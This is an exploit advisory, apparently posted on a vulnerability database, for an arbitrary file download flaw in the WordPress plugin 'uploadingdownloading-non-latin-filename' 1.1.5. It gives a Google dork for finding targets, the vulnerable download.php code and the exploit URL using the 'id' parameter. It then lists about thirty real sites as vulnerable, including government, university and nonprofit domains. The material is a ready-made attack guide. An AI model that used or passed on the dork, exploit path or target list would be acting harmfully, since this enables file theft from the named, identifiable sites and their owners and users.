WordPress uploadingdownloading-non-latin-filename Plugins 1.1.5 Arbitrary File Download Vulnerability

2018.11.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : WordPress uploadingdownloading-non-latin-filename Plugins 1.1.5 Arbitrary File Download Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 29/11/2018 # Vendor Homepage : wordpress.org/plugins/uploadingdownloading-non-latin-filename/ # Software Download Link : downloads.wordpress.org/plugin/uploadingdownloading-non-latin-filename.1.1.5.zip # Tested On : Windows and Linux # Category : WebApps # Version Information : From 1.02 to 1.1.5 / All Current Versions # Google Dorks : inurl:''/wp-content/plugins/uploadingdownloading-non-latin-filename/'' # Exploit Risk : Medium # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-200 - [ Information Exposure ] - CWE-23 - [ Relative Path Traversal ] CWE-98 - [ Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') ] ################################################################################################# WordPress uploadingdownloading-non-latin-filename Plugins is prone to a vulnerability that lets attackers to download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the webserver process. The attacker can download and read all files known by the name via 'id' parameter. Information obtained may aid in further attacks. ################################################################################################# Vulnerability File PHP Code : /download.php <?php if( ! isset($_GET['id']) or empty($_GET['id'])){ echo "error! enter attachment ID!"; exit; } include '../../../wp-blog-header.php'; include 'Browser/lib/Browser.php'; $filename_for_download = nlf_get_filename_for_download($_GET['id']); $attachment = get_post($_GET['id']); $attachment_meta = get_post_meta($_GET['id']); $upload_dir = wp_upload_dir(); $original_filepath = $upload_dir['basedir'] . '/' . $attachment_meta['_wp_attached_file'][0]; $browser = new Browser(); if( $browser->getBrowser() == Browser::BROWSER_IE ){ $filename_encoded = rawurlencode($filename_for_download); }else{ $filename_encoded = $filename_for_download; } status_header(200); header('cache-control: no-cache'); header('Content-type: ' . $attachment->post_mime_type); header("Content-Disposition: attachment; filename=" . $filename_encoded); // orifinal file readfile($original_filepath); ################################################################################################# # Admin Panel Login Path : /wp-login.php # Vulnerability Error : error! enter attachment ID! # Exploit : /wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] ################################################################################################# # Example Vulnerable Sites => [+] ppf.gov.iq/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] pel.smuc.ac.kr/~cisc2017s/wordpress/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] szupu.szu.edu.cn/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] tdlshop.in/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] meditationedu.org/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] appbiz.seoul.kr/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] gwangjufolly.org/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] technician.kr/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] doc.arch.mju.ac.th/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] dft.cute.edu.tw/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] 119.gg.go.kr/north/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] research.beautifulfund.org/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] svenskjakt.se/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] ilmin.org/kr/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] architecture.kunsan.ac.kr/mchangho/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] blog.solarview.net/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] womenfund.or.kr/wordpress/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] gwangjufolly.org/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] cisp.or.kr/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] risingx.kr/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] tigersw.com/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] sehub.net/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] missionbridge.net/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] startup.kaist.ac.kr/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] ericaiie.hanyang.ac.kr/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] ganaart.com/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] health.re.kr/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] hosting01.snu.ac.kr/~linguist/cwp/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] hukobio.co.kr/wordpress/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] dasreich.myqnapcloud.com/kfz222wp/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] womenfund.or.kr/wordpress/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] [+] juul-nielsen.dk/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=[FİLENAMEHERE] ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
33%
67%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top